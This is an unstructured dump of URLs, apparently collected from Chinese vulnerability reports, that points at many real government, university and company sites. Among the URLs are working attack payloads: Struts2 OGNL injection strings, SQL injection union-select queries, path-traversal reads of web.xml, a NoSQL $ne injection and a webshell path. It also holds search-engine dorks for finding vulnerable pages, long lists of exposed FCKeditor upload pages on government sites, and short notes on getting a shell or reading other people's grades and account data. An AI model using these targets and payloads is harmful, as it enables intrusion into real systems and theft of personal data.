http://221.2.171.59:8200/webcwgkzhen.aspx?deptid=52 http://218.58.124.131:8003/webcwgkzhen.aspx?deptid=4538 http://222.135.109.70:8200/webcwgkzhen.aspx?deptid=54 http://218.56.40.229:8005/webcwgkzhen.aspx?deptid=3942 http://221.2.149.47:8200/webcwgkzhen.aspx?deptid=144&zd=259 http://218.56.99.84:8003/webcwgkzhen.aspx?deptid=3942 http://222.134.154.214:8001/webcwgkzhen.aspx?deptid=3942 http://222.134.66.54:8014/webcwgkzhen.aspx?deptid=3942 http://zuss.zju.edu.cn/sdc/jbxx.do?method=show&gnmkdm=N01012&type=ptzjz&xh=3140101021 http://115.29.79.164/ http://222.135.109.70:8300/sysmanage/jwhzdview.aspx?newsid=409 http://123.134.189.60:8016/bmfw/jwhzdview.aspx?newsid=11266 http://221.2.149.47:8200/bmfw/jwhzdview.aspx?newsid=540 http://218.56.40.229:8061/bmfw/jwhzdview.aspx?newsid=11726 http://222.135.76.147:8300/sysmanage/jwhzdview.aspx?newsid=1762 http://art.sanguosha.com/detail.php?id=24 http://king.sanguosha.com/ http://mail.wo.cn http://www.zx110.org/loginUser.do ftp://218.58.70.229/ http://zone.wooyun.org/content/7790 http://oms.haier.com/fckeditor/editor/fckeditor.html http://116.213.76.41:8080/ app.syzsks.com/county/viewcontent.jsp?id=227 http://www1.snut.edu.cn/wyxy/management/login.asp http://www1.snut.edu.cn/tzb/index.asp http://www1.snut.edu.cn/tzb/case/detail.asp?id=96 http://www1.snut.edu.cn/tzb/admin/index.asp http://www.cttgz.com/PageTemplate.asp?ID={F677A60D-F4D8-45D9-B29C-8F5C4A938107 http://www.cdt.cc/sjzx_xx.php?id=97 http://www.cdt.cc/1.php http://jwxt.tzpc.edu.cn/jxpj/pj_admin_left.asp http://jwxt.nnutc.edu.cn//jxpj/pj_admin_left.asp http://www1.szitu.cn:86//jxpj/pj_admin_left.asp http://222.187.199.60//jxpj/pj_admin_left.asp http://jwcx.czie.net//jxpj/pj_admin_left.asp http://jwxt.tzpc.edu.cn//jxpj/pj_admin_left.asp http://www.mcsc.com.cn/anshow.php?id=1279 http://www.mcsc.com.cn/honorDisplay.php?partid=25 http://www.mcsc.com.cn/EInformation.php http://www.mcsc.com.cn/file.php?partid=13 http://www.mcsc.com.cn/industryNews.php?partid=14 http://www.mcsc.com.cn/informationActivitys.php?partid=15 http://www.mcsc.com.cn/Introduction.php?partid=30 http://www.mcsc.com.cn/moreInfor.php?partid=36 http://www.mcsc.com.cn/societyLatest.php?partid=13 http://www.mcsc.com.cn/vipMem.php?ruhuiIdentity=&username=12345 http://www.mcsc.com.cn/vipMem.php?partid=43 http://www.mcsc.com.cn/loginInfo.php http://www.mcsc.com.cn/regUserInfo.php http://www.mcsc.com.cn/css/ http://www.mcsc.com.cn/icons/ http://**.**.**/Default.aspx_ http://px.xmrc.com.cn/unitAction!goRegister.action http://218.10.227.2/hbj/login.action http://www.xiaomd.com/index.action http://www.auxgroup.com/productlist.aspx?nodecode=0002 www.dfss.com.cn http://www.dfss.com.cn/manage/EditAdmin.aspx http://jxyj.sdbi.edu.cn/yns_upload.asp http://jxyj.sdbi.edu.cn/yns_upload.asp?GP_upload=true http://jxyj.sdbi.edu.cn/yns_upload.asp http://wooyun.org/bugs/wooyun-2014-085148 http://www.myhm.org/bys/login/?csid=gY0&bz=C http://218.89.178.234:8080/ ip:61.129.93.246 http://www.lysfda.gov.cn/Article_Print.asp?ArticleID=706 http://www.lysfda.gov.cn/admin_login.asp http://117.34.102.36:8080/vrd/front/userInfo/gotoIndex.action http://pop.wanda.cn http://www.tctjj.gov.cn/Article_Print.asp?ArticleID=20 http://60.190.204.108/portal/catalogtemplate/1/index.jsp?catalog_id=20061127000012 http://www.jnyy.gov.cn/Article_Print.asp?ArticleID=71 http://tianjinrd.sinosteel.com/gzdts.asp?id=277 http://tianjinrd.sinosteel.com/Manage/Admin/Login.asp http://tianjinrd.sinosteel.com/ http://club.xywy.com/comeback_fromurl.php?qon=47485053&qid=56537950 http://localhost/upload/mobile/index.php http://www.dj100.cn/CogWeb/main/main.action http://www.zzxfj.gov.cn/main.asp?menu_id=65 http://220.178.49.194/Login.aspx http://www.f747.com/eflyguanli/gongzuo/xiangxi.asp?id=5382 https://e.boc.cn/ehome/SQISOFT/web/webNew/nSellorDetail.aspx?ShangID=ES0000000079 http://www.hneeb.cn/website/newsdoc/jyrd/cjfxxt.htm http://gkzypg.hneeb.cn/cscj/MainFrame.aspx中的cscj更改成cj其余不变。然后就以师大附中的名义登陆了~可以查询最近几年的所有人的各科成绩。 http://www.smxxf.gov.cn/lanmu.asp?lm_id=51 http://www.hnxcxf.gov.cn/news/news_more.asp?lm2=158 http://www.petropub.com:8085/ https://e.boc.cn/ehome/SQISOFT/web/webNew/nLifeKnowlege_detail.aspx?sta=canpass&csId=CS0000000008 https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguan_service_detail.aspx?wuguanServeId=PT0000000019 https://e.boc.cn/ehome/SQISOFT/web/webNew/nSellorMessageList.aspx?ESA_SHOPID=ES0000000080 http://wooyun.org/bugs/wooyun-2010-077623 http://wooyun.org/bugs/wooyun-2014-080019 http://www.phoenixcne.de/video_news_list.php?category=special http://www.lxzjc.gov.cn/jubao/admin/FCKeditor/editor/filemanager/connectors/test.html# http://www.ysland.gov.cn/xinfang/admin/FCKeditor/editor/filemanager/connectors/test.html ip:222.73.242.41 http://123.125.203.140/seeyon/main.do system:system用户,导致邮箱配置信息泄露,由于邮箱配置为邮箱管理员导致该公司整个邮件系统的沦陷。 http://210.29.17.68/WFManager/loginAction_getCheckCodeImg.action http://wan.8264.com/xianlu-320 http://wan.8264.com/使用ecmll http://gx.189.cn/%c0%ae/WEB-INF/web.xml http://ts.mskjj.gov.cn/admin/FCKeditor/editor/filemanager/connectors/test.html# http://www.dzmzj.gov.cn/jzxx//admin/FCKeditor/editor/filemanager/connectors/test.html# https://e.boc.cn/ehome/SQISOFT/web/webNew/nTopicDetail.aspx?endId=46db2fb9-1bac-45ab-a153-62092fa9e556 https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguan_news_detail.aspx?newsId=PN0000000001 https://e.boc.cn/ehome/SQISOFT/web/webNew/nSellorActivityList.aspx?ShangID=ES0000000096 http://www.jsgjj.cn/gjj/personal/login.action http://www.skyexam.com/MemberQualificationManage/StudentModify.aspx?PK=121115000007043 http://www.fjdz.org.cn:81/RuleList.asp?ColID=2 http://xf.jlthjy.com/rulelist.asp?cid=1 http://www.sdjs.gov.cn/jcms/m_5_7/replace/opr_importinfo.jsp?fn_billstatus=1 http://218.77.183.6/website/lookJsjUser.do?id=45670 http://kzone.kuwo.cn/mlog/ www.kuwo.cn http://www.kuwo.cn http://59.41.66.188/OAapp/WebObjects/OAapp.woa http://cfa.gzhu.edu.cn/index.php?c=info&a=index&id=335&cid=76 http://cfa.gzhu.edu.cn/index.php?c=info&a=index&id=335'&cid=76 http://www.510bx.com/Insurance/InsuranceOrderQuery.aspx?DeptID=228147 http://mail.fuck.com/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse= http://www.njztb.cn/complaint/rulelist.asp?cid=2 http://kjc.njupt.edu.cn/admin/loginAdminUser.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D bbs.shouji.baofeng.com/uc_server http://i0.letvimg.com/phone/201208/17/201208171335166961.png live_url:http://live.gslb.letv.com/gslb?stream_id=zhejiang&tag=live&ext=m3u8&sign=live_phone http://live.shouji.baofeng.com/live/channel_detail/?channel_id=16&os_version=ipad&bf_version=3.6.5 http://mxt.be.xiaomi.com/mxt/static/ http://hmxx.yooknet.com/reg/action/index.php https://zfgjj.hanzhong.gov.cn https://xncb.gov.cn https://mdjsp.gov.cn ip:61.129.42.76 http://www.ecerb.gov.cn/upload/ http://tg.gmw.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20union%20%20%20select%201,2,3,4,5,user%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23 http://www.epicc.com.cn/eproperty/displayInfo/showOrderDetail.do?orderId=85da35b49bc1xxxxxxede294e970 http://www.epicc.com.cn/eproperty/displayInfo/showOrderDetail.do?orderId=输入订单号直接访问 http://gytc.whut.edu.cn/login/Jeecms.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://overseas.5i5j.com/houses site:gov.cn inurl:visitseacrch.asp site:gov.cn inurl:rulelist.asp http://www.lxzjc.gov.cn/jubao/admin/FCKeditor/editor/filemanager/connectors/test.html# http://www.qyx.gov.cn/wsxinfang//admin/FCKeditor/editor/filemanager/connectors/test.html http://www.yiliang.gov.cn/xf//admin/FCKeditor/editor/filemanager/connectors/test.html# http://www.sidui.gov.cn/xinfang1//admin/FCKeditor/editor/filemanager/connectors/test.html# http://www.ymlz.gov.cn:808//admin/FCKeditor/editor/filemanager/connectors/test.html http://www.yjxzzb.gov.cn//admin/FCKeditor/editor/filemanager/connectors/test.html http://www.gswx.gov.cn/xinfang//admin/FCKeditor/editor/filemanager/connectors/test.html http://www.dxmzj.gov.cn/jzxx//admin/FCKeditor/editor/filemanager/connectors/test.html http://www.flqzgzw.gov.cn/xf//admin/FCKeditor/editor/filemanager/connectors/test.html http://www.jxqgb.gov.cn/wangshangxinfang//admin/FCKeditor/editor/filemanager/connectors/test.html http://www.xjgl.gov.cn/xzxx//admin/FCKeditor/editor/filemanager/connectors/test.html http://www.qjetc.gov.cn:88/sfwt//admin/FCKeditor/editor/filemanager/connectors/test.html http://www.sanhu.gov.cn/xinxiang//admin/FCKeditor/editor/filemanager/connectors/test.html http://www.jsjhcz.gov.cn/czyx//admin/FCKeditor/editor/filemanager/connectors/test.html http://www.wuxixs.jcy.gov.cn/jvbao//admin/FCKeditor/editor/filemanager/connectors/test.html http://kf.yyugame.com/ http://cometd.coolyun.com/cometd/index.do http://developer.coolyun.com/index.php http://218.91.214.253/webgps/ http://app1.chinadaily.com.cn/survey/v.php?mmid=841 http://energy.chinadaily.com.cn/ http://energy.chinadaily.com.cn/bbs/uc_server/control/admin/db.php http://energy.chinadaily.com.cn/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ inurl:/oa/KeySearch.aspx?type= http://admin.96020228.cn/ http://admin.96020228.cn/DeovoOpration_edit.asp?rowid=1 http://admin.96020228.cn/DeovoOpration_do.asp?action=modify&chat_no=1 http://blog.kf5.com/wp-login.php http://system.greentree.com.cn:8080/frontinvest/managerLoad.aspx http://system.greentree.com.cn:8080/frontinvest/NewsList.aspx?newskind=2 http://system.greentree.com.cn:8080/op/Module_ERP/home.htm http://system.greentree.com.cn:8080/op/module_erp/menu.aspx http://system.greentree.com.cn:8080/op/module_erp/market/Search.aspx http://gb.immomo.com/.git/config ftp://121.201.16.205/ http://125.93.53.5:8081/admin http://www.dhsfda.com/home/newsone.php?action=look&classid=11&id=502 http://www.dhsfda.com/home/newsone.php?action=look&classid=11&id=502%20and%201=1 http://www.dhsfda.com/home/newsone.php?action=look&classid=11&id=502%20and%201=11 www.shendong.com.cn http://vckb.l247.bizcn.com/www/newsOne.php?id=282 http://vckb.l247.bizcn.com/www/newsOne.php?id=282 http://campaign.51fund.com/bak.jsp http://moffice.wo.com.cn/news_show.php?MenuID=4&NewsID=144 http://www.e2go.com.cn/ www.e2go.com.cn)是基于长途客运联网售票系统建立的面向长途旅客的专业性门户网站。发售全北京各个长途汽车站点的网络售票服务。 http://wm.crsg.com.cn/fckeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp http://www.hnswht.gov.cn//cms/voteManager/seeresult_bz.jsp?titleid=2&opid=1 http://web2.gdupt.edu.cn/jiangong/admin.php/Public/login http://bknzsw.swu.edu.cn/v/denglu.sql http://www.hntsw.gov.cn/comment_info.jsp?sslm=00202&xxbh=4609 http://211.142.26.14/comment_info.jsp?sslm=00204&xxbh=2849 http://app.xjzj.gov.cn:8080/comment_info.jsp?sslm=00202&xxbh=16801 http://124.238.116.11:81/comment_info.jsp?sslm=00201&xxbh=6201 http://www.2yuanyy.com/SearchList.aspx?key=423'&class=1 http://pay.111.com.cn/payment/common/tradeNotify.action http://erp.998.com/webportal_electroniccommerce/RoomUsableReport.aspx http://www.111.com.cn/ http://buy.111.com.cn/interfaces/order/orderSure.action http://sms.9air.com/user!loginNoName.action http://i.yixin.com/ http://www.tsrb.com.cn:7001/login.action http://cms40.legaldaily.com.cn:7001/enpadmin/login.jsp http://www.hnic.com.cn:7001/enpadmin/login.jsp http://sys.zqsb.com.cn:7001/enpadmin/login.jsp http://jjc.hbsjtt.gov.cn:81/enpadmin/login.jsp http://210.72.21.12:8008/enpadmin/login.jsp www.china.com.cn http://jjc.hbsjtt.gov.cn:81/enpadmin/login.jsp http://61.153.35.46:7001/enpadmin/login.jsp http://www.jhnews.com.cn http://210.192.127.111:8991/enpadmin/login.jsp http://221.231.99.235:7001/enpadmin/login.jsp http://125.93.53.9/account/buyer/orderDetail.html?order_id=3631030 https://www.lashoupay.com/newjiesuan/login/submit.do http://test.lashoupay.com/lashoupay/lashoupay/login.action http://zqb.creditease.cn/pages/User/personalCenter.do?email=1@qq.com&emailFlag=fromemail&option=binding http://**.**.**/scripts/ http://**.**.** http://125.93.53.9/account/buyer/orderDetail.html?order_id=3631030。 http://218.205.171.101:8080/ http://dc.piccnet.com.cn/selfbind/stb/home.action?bName=dc http://www.ejiayu.com/wwwroot.rar inurl:GroupSpace?groupId= http://www.ycyz.com.cn/bl/GroupSpace?groupId=group831000000001 http://zjyiz.zje.net.cn/bl/GroupSpace?groupId=group43000000044 http://www2.weiyu.sh.cn/bl35/GroupSpace?groupId=group56000000016 http://www.hszhj.pudong-edu.sh.cn/bl/GroupSpace?groupId=group39000000003 http://casz.dgjy.net/bl/GroupSpace?groupId=group16000000003 http://www.hshsh.pudong-edu.sh.cn/bl/GroupSpace?groupId=group301000000001 http://www.sms8090.com/superadmin/index.action http://114.242.194.165:8080/ec-web:哈弗商城 http://www.mysql.com/downloads/api-jdbc-stable.html jdbc:mysql://192.168.1.3:3306/dbjddb?useUnicode=true&characterEncoding=utf8 jdbc:mysql://localhost:3306/dbjddb?useUnicode=true&characterEncoding=utf8 http://42.121.113.227/index.html http://steward.shanghai-air.com/1.txt inurl:NTRdrLogin.aspx http://124.133.52.135/ModifyPassWord.aspx http://opac.jxlib.gov.cn/ModifyPassWord.aspx http://opac.its.csu.edu.cn/ModifyPassWord.aspx http://ilas.pxlib.cn/ModifyPassWord.aspx http://218.28.6.78/ModifyPassWord.aspx http://218.195.101.103/ModifyPassWord.aspx http://ilas.ynlib.cn/ModifyPassWord.aspx http://opac.whsw.cn/ModifyPassWord.aspx http://218.195.112.99/ModifyPassWord.aspx http://202.96.165.98/ModifyPassWord.aspx http://124.133.52.135/ModifyPassWord.aspx http://210.34.212.78/ModifyPassWord.aspx http://my.zslib.cn/ModifyPassWord.aspx http://211.69.140.40/ModifyPassWord.aspx http://218.64.118.42:88/ModifyPassWord.aspx http://182.135.65.151:9999/ModifyPassWord.aspx http://182.135.65.151:9999/ModifyPassWord.aspx http://182.135.65.151:9999 http://mob.17173.com/search.php post:keys=1&Tclass=1&searchclass=News_title&Submit=%CB%D1+%CB%F7&page= http://sms.tootoo.cn/login.action http://www.966009.com/ http://www.966009.com/client/newsshow/jiaofeiwangdian.aspx?city=1 http://eshop.shenzhenair.com/index.action http://huistory.com/index.php?m=base&c=login&a=index http://e.sxhm.com/admin/pcfinal_login.asp http://www.honghonghu.com/account/reset-password/180 http://211.151.13.149:8080/zabbix/index.php http://erp.suning.com.cn http://erp.suning.com.cn/hrss/login.jsp的忘记密码处 http://erp.suning.com.cn/hrss/ResetPwd.jsp http://nsp.lashou.com/ ttp://nsp.lashou.com/Home/Data/refund_list?goods_id=&start_time=2014-12-07&end_time=2014-12-07 http://job.renren-inc.com/info.php www.56.com www.yhd.com http://www.hsfdc.com/web/Pubinfo/xmdljgxx_Detail.asp?jgbh=22 http://www.essfdc.gov.cn/pubinfo/xmdljgxx_Detail.asp?jgbh=13 http://www.ltxfdc.com/pubinfo/xmdljgxx_Detail.asp?jgbh=3 http://www.dyfdc.net.cn/pubinfo/xmdljgxx_Detail.asp?jgbh=29 http://www.tmfdc.gov.cn/pubinfo/xmdljgxx_Detail.asp?jgbh=15 www.vgoldpay.com http://haha.baozou.com/manhua/18.html http://haha.baozou.com/manhua/18.html http://haha.baozou.com/plus/showpl.php?id=18&classid=1&type=16&up=0 http://ffyj.bgpintl.com/Web/ShowShared.aspx?m=research&type=Research&strID=31 http://1626.dooland.com/float_check_cart.php http://baozouribao.com/articles/4977423?from=web_right# http://baozouribao.com/articles/4977423?from=web_right# http://b.ltyg.cn/BManage/SSO/DoLogin.aspx?check=1 http://b.ltyg.cn/EcManage/request/ShowLeaveword.aspx?ids=1 http://bj.cltt.org/Web/ http://crm98.cn/UsersAction_getLog.action http://www.zte-e.com/ http://www.zte-e.com/cn/Search.aspx?Keyword= http://www.zte-e.com/manage/AdminLogin.aspx http://Mail.mailer.com.cn/JDWA/cgi/user_verify_agree.cgi?checkbox=mailer.com.cn+test123 http://oa.dodopal.com http://enquiry.dodopal.com:9997/fapaym/login.action http://vdian.vip.58.com/user/bizcard/10901511882246/35828?all=1 http://thgs.shenhuagroup.com.cn/uploads/ http://thgs.shenhuagroup.com.cn/includes/ http://thgs.shenhuagroup.com.cn/uploads/user/user_info.xls http://211.151.14.143 https://excashier.alipay.com/standard/trade20001/templateFlow.htm?orderId=c4a86d9a8xx00ea2&action=init#orderList http://oatest.tpyzq.com/yzmdy.php http://db.826sz.com/webccb/toupiao.aspx, www.sogosz.com www.826sz.com http://www.quamir.com/quamir/moreMarketNews.action http://www.snrlzy.com/logoinformation.aspx?comun=xzsds http://www.snrlzy.com/logoinformation.aspx?comun=xzsds http://www.xnfcj.com/pubinfo/StatData.asp http://www.szfcsc.com/web/PubInfo/StatData.asp?fwlx=%C9%CC%D2%B5%C3%C5%B5%EA&QryOfYear=%C6%E4%CB%FB http://www.hsfdc.com/web/PubInfo/StatData.asp?fwlx=%C6%E4%CB%FB&QryOfYear=%C9%CC%C6%B7%B7%BF http://www.jsxfgj.com/PubInfo/StatData.asp?fwlx=%C9%CC%C6%B7%B7%BF&QryOfYear=%C9%CC%C6%B7%B7%BF http://www.essfdc.gov.cn/PubInfo/StatData.asp?QryToday=%C9%CC%D2%B5%D3%C3%B7%BF&fwlx=%C9%CC%D2%B5%D3%C3%B7%BF&QryOfYear=%C9%CC%C6%B7%B7%BF http://www.ltxfdc.com/pubinfo/StatData.asp?fwlx=%C9%CC%C6%B7%B7%BF&QryOfYear=%C9%CC%C6%B7%B7%BF http://www.bsfcj.com/PubInfo/StatData.asp?QryTM=%C9%CC%C6%B7%B7%BF&fwlx=%C9%CC%C6%B7%B7%BF&QryOfYear=%D7%A1%D5%AC http://www.tfxfdc.com/pubinfo/StatData.asp?fwlx=%C6%E4%CB%FB&QryOfYear=%C9%CC%D2%B5 http://www.dyfdc.net.cn/pubinfo/StatData.asp?QryToday=%D7%A1%D5%AC&fwlx=%B0%EC%B9%AB%C2%A5&QryOfYear=%B0%EC%B9%AB%C2%A5 http://www.haxfdc.com/web/PubInfo/StatData.asp?fwlx=%C9%CC%C6%B7%B7%BF&QryOfYear=%C9%CC%C6%B7%B7%BF http://zone.wooyun.org/content/17131 http://zjjs.zjut.edu.cn/news_show.php?ShowId=20816 http://bucee.net/ http://thgs.shenhuagroup.com.cn/ http://www.taixin.cn/ http://www.taixin.cn/Saber_Manage/ http://211.151.36.37/ http://pawn.mofcom.gov.cn/pawn_monitor/login2.do?password=202CB962AC59075B964B07152D234B70&logname=53a49a51a48a56a65a49a48a48a49a50&type=client&corpId=73632&funcMethod=monthreport inurl:SrcNotice.jsp?businessid= http://www.lnxzfw.gov.cn/ViewSource/SrcNotice.jsp?businessid=8b81cf2b37d58e012b382e76240105 http://117.40.128.59:1100/outportal/ViewSource/SrcNotice.jsp?businessid=818ab52a924beb012a93d943660354 http://117.40.186.185:8008/outportal/ViewSource/SrcNotice.jsp?businessid=8080812a9e1b06012aa188f6540079 http://xzfw.ncqsh.gov.cn/ViewSource/SrcNotice.jsp?businessid=2880e92a98ce5e012a990c912300c1 http://xzsp.jxgc.gov.cn/outportal/ViewSource/SrcNotice.jsp?businessid=8b81d22b3f0bde012b41d8a7350361 http://222.133.32.11:31188/ecgapout/ViewSource/SrcNotice.jsp?businessid=80808137cb7a280137d036a14513d9 http://www.lnxzfw.gov.cn/ViewSource/SrcNotice.jsp?businessid=8b81cf2b37d58e012b38449a0c0181 http://117.40.239.74/outportal/ViewSource/SrcNotice.jsp?businessid=beed753a905fa6013a906862f804d3 http://www.wooyun.org/bugs/wooyun-2014-085328/trace/bea267ff11e5f5bdd26e3fd293266ce7 http://kingchannels.cn/softwarer/member/userlogin.asp http://www.wooyun.org/bugs/wooyun-2014-086050/trace/76d05edef536040799165ac0b25c75ff http://hitee.hit.edu.cn:8080/JspSpyJDK5.jsp inurl:/list.jsp http://www.ldlyy.com/search.jsp?strsearch=1 http://www.gsjkjy.org.cn/search.jsp?strsearch=1 http://www.gsblood.com/search.jsp?strsearch=1 http://www.jcsxz.com/search.jsp?strsearch=1 http://www.qyszxxz.com/search.jsp?strsearch=1 inurl:Article_Print.asp?ArticleID= http://lixue.henau.edu.cn/Article_Print.asp?ArticleID=674 http://lixue.henau.edu.cn/Article_Print.asp?ArticleID=674 http://dep.yctc.edu.cn/chinese/wlkc/gggxx/Article_Print.asp?ArticleID=32 http://dept.wyu.edu.cn/wlsyzx/Article_Print.asp?ArticleID=1084 http://jpkc.njau.edu.cn/sketch/Article_Print.asp?ArticleID=969 http://db1.hut.edu.cn/Article_Print.asp?ArticleID=2004 http://www.cls.hznu.edu.cn/hjhx/Article_Print.asp?ArticleID=573 http://www2.ouc.edu.cn/sbc/Article_Print.asp?ArticleID=261 http://tw.gzhu.edu.cn/Article_Print.asp?ArticleID=2392 http://xsc.hnfnu.edu.cn/Article_Print.asp?ArticleID=188 http://country.whpu.edu.cn/Article_Print.asp?ArticleID=725 http://caiwu.bigc.edu.cn/Article_Print.asp?ArticleID=247 http://www.gdfda.org/index.php/Index/note/id/156 http://www.gdfda.org/index.php/Index/note?id=156 http://www.gdfda.org/index.php/Index/note?id=156 http://www.gdfda.org/index.php/Index/note?id=156 http://www.gdfda.org/index.php/Index/note?id=156 http://sdgs.shenhuagroup.com.cn/web.rar http://www.runoqd.com/ http://58.58.34.98:8090/ClientQuery/ClientInfo.aspx http://www.10050.net,选择河北省,在网站横幅菜单中选择网上营业厅-宽带自助,输入获取到的宽带账号和密码,查询上个月(除当月以外的月份),便可获取到用户的信息。 http://www.tzqf.gov.cn/adm/Login.html http://space.fang.com/21191911/index/ http://space.fang.com/?c=relation&a=addfollow&userid=21191911 http://www.baidu.com/index?username[$ne]=x http://drops.wooyun.org/tips/3939 http://docs.mongodb.org/manual/reference/operator/query/ http://map.qq.com/ http://map.qq.com/?l=228692835 http://youxue.juren.com/plus/article_image.php?aid=1628 http://www.auxgroup.com/FWNewsList.aspx?NodeCode=00040001 www.0755tt.com http://opengame.baidu.com/index.php?r=InternalMessageAction&m=view&id=xxx%20and%201=2%20union%20select%201,2,@@version,4,5%20from%20information_schema.tables%23&type=2 http://opengame.baidu.com/index.php?r=InternalMessageAction&m=delete-one&type=2&ids=xxx http://221.5.243.11:9090/%E6%9C%8D%E5%8A%A1%E5%99%A8/jboss-4.0.5.GA/server/default/deploy/jmx-console.war/WEB-INF/classes/org/jboss/jmx/ http://221.5.243.13:8088/neon_admin/admin/login.do# http://www.bzjjjc.gov.cn/summaryarticle.php?MsgId=71511 http://www.10010999.com/cms/login.jsp http://www.10010999.com/cms/login.jsp www.10010999.com http://www.ysland.gov.cn/xinfang/ruleshow.asp?id=12 https://webmail.ecnu.edu.cn/ http://shx.hit.edu.cn http://shx.hit.edu.cn/jsp/web/index/webDownload.do?inputPath=/WEB-INF/web.xml&filename=wooyun.txt www.xxx.com/do.php?act=user_cart_del www.xxx.com/do.php?act=user_shopfavorite_del http://webchat.ruijie.com.cn/live800/chatClient/chatbox.jsp?companyID=8933&configID=7&skillId=1&enterurl=http://webchat.ruijie.com.cn http://my.buu.edu.cn/ http://survey.game.renren.com/index.php?sid=28299 http://e.qq.com/ec/api.php?mod=report&act=adgroup&g_tk=991968923&d_p=0.36786074754056486&datetype=1&format=json&page=1&pagesize=20&sdate=2014-12-09&edate=2014-12-09&status=&fastdate=custom&searchtype=&searchname=&reportonly=0&product_type=&product_id=&campaignid=256945&callback=_Callback&owner=****** http://win.zteup.com,一个购物的网站,存在上传漏洞,可以getshell http://win.zteup.com:8080/main/upload/20141209142407291292039.jsp codehttp://219.142.40.227/Logon.aspx http://219.142.40.227 http://www.hcasc.gov.cn/Download.asp?n=Download.asp http://113.106.164.25 http://mail.zsks.gov.cn/webmail/getPass.php?email=aaa@zsks.gov.cn&update=s inurl:gb/company.asp http://www.bolin.com.hk//Utility/UploadFile/FileList.asp http://www.hengtongdz.com//Utility/UploadFile/FileList.asp http://www.kenengdq.com//Utility/UploadFile/FileList.asp http://www.huaxinsj.com//Utility/UploadFile/FileList.asp http://www.tslingerie.com//Utility/UploadFile/FileList.asp http://www.zhuoqishanzhuang.com//Utility/UploadFile/FileList.asp http://www.dkg.com.cn//Utility/UploadFile/FileList.asp http://www.zsmeierjia.com//Utility/UploadFile/FileList.asp http://www.dgsanyo.com//Utility/UploadFile/FileList.asp http://www.jinludalight.com//Utility/UploadFile/FileList.asp http://www.dg-hy.com.cn//Utility/UploadFile/FileList.asp http://www.yhtec.com.cn//Utility/UploadFile/FileList.asp http://www.fuhuacarpet.com//Utility/UploadFile/FileList.asp http://www.lmfdz.com//Utility/UploadFile/FileList.asp http://www.alan-aic.com//Utility/UploadFile/FileList.asp xx.dooland.com/float_check_cart.php autofan.dooland.com/float_check_cart.php bhstory.dooland.com/float_check_cart.php bjsqb.dooland.com/float_check_cart.php bjsqb.dooland.com/float_check_cart.php bjsqb.dooland.com/float_check_cart.php bjsqb.dooland.com/float_check_cart.php bjsqb.dooland.com/float_check_cart.php bjsqb.dooland.com/float_check_cart.php bjzb.dooland.com/float_check_cart.php bkzs.dooland.com/float_check_cart.php blogweekly.dooland.com/float_check_cart.php bqzs.dooland.com/float_check_cart.php bxzj.dooland.com/float_check_cart.php caifutang.dooland.com/float_check_cart.php caijing.dooland.com/float_check_cart.php caijingtianxia.dooland.com/float_check_cart.php caikuaixinbao.dooland.com/float_check_cart.php cbrand.dooland.com/float_check_cart.php cbzz.dooland.com/float_check_cart.php ccmm.dooland.com/float_check_cart.php ceocio.dooland.com/float_check_cart.php ceoun.dooland.com/float_check_cart.php cgoldjewelry.dooland.com/float_check_cart.php chaonanzhi.dooland.com/float_check_cart.php charm.dooland.com/float_check_cart.php chewang.dooland.com/float_check_cart.php chinaapparel.dooland.com/float_check_cart.php chinatoday.dooland.com/float_check_cart.php chinattw.dooland.com/float_check_cart.php chinaxiaokang.dooland.com/float_check_cart.php chip.dooland.com/float_check_cart.php ciweekly.dooland.com/float_check_cart.php cnemag.dooland.com/float_check_cart.php cniti.dooland.com/float_check_cart.php COCO.dooland.com/float_check_cart.php comicfans.dooland.com/float_check_cart.php comicshow.dooland.com/float_check_cart.php comicworld.dooland.com/float_check_cart.php corp.dooland.com/float_check_cart.php cpcfan.dooland.com/float_check_cart.php cpcw.dooland.com/float_check_cart.php cwsj.dooland.com/float_check_cart.php cyb.dooland.com/float_check_cart.php cyj.dooland.com/float_check_cart.php daxuesheng.dooland.com/float_check_cart.php dazhongDV.dooland.com/float_check_cart.php dazhongsheying.dooland.com/float_check_cart.php ddsj.dooland.com/float_check_cart.php djnsc.dooland.com/float_check_cart.php djnzj.dooland.com/float_check_cart.php dmcy.dooland.com/float_check_cart.php dnahz.dooland.com/float_check_cart.php dutianxia.dooland.com/float_check_cart.php dzlcgw.dooland.com/float_check_cart.php dzqc.dooland.com/float_check_cart.php dztzzn.dooland.com/float_check_cart.php dzyc.dooland.com/float_check_cart.php ebusinessreview.dooland.com/float_check_cart.php enterainment.dooland.com/float_check_cart.php fc.dooland.com/float_check_cart.php ffs.dooland.com/float_check_cart.php fh.dooland.com/float_check_cart.php foto-video.dooland.com/float_check_cart.php fsz.dooland.com/float_check_cart.php fxjj.dooland.com/float_check_cart.php FZDMAG.dooland.com/float_check_cart.php fzfzzk.dooland.com/float_check_cart.php ganla.dooland.com/float_check_cart.php gaoerfudujia.dooland.com/float_check_cart.php gjxqdb.dooland.com/float_check_cart.php 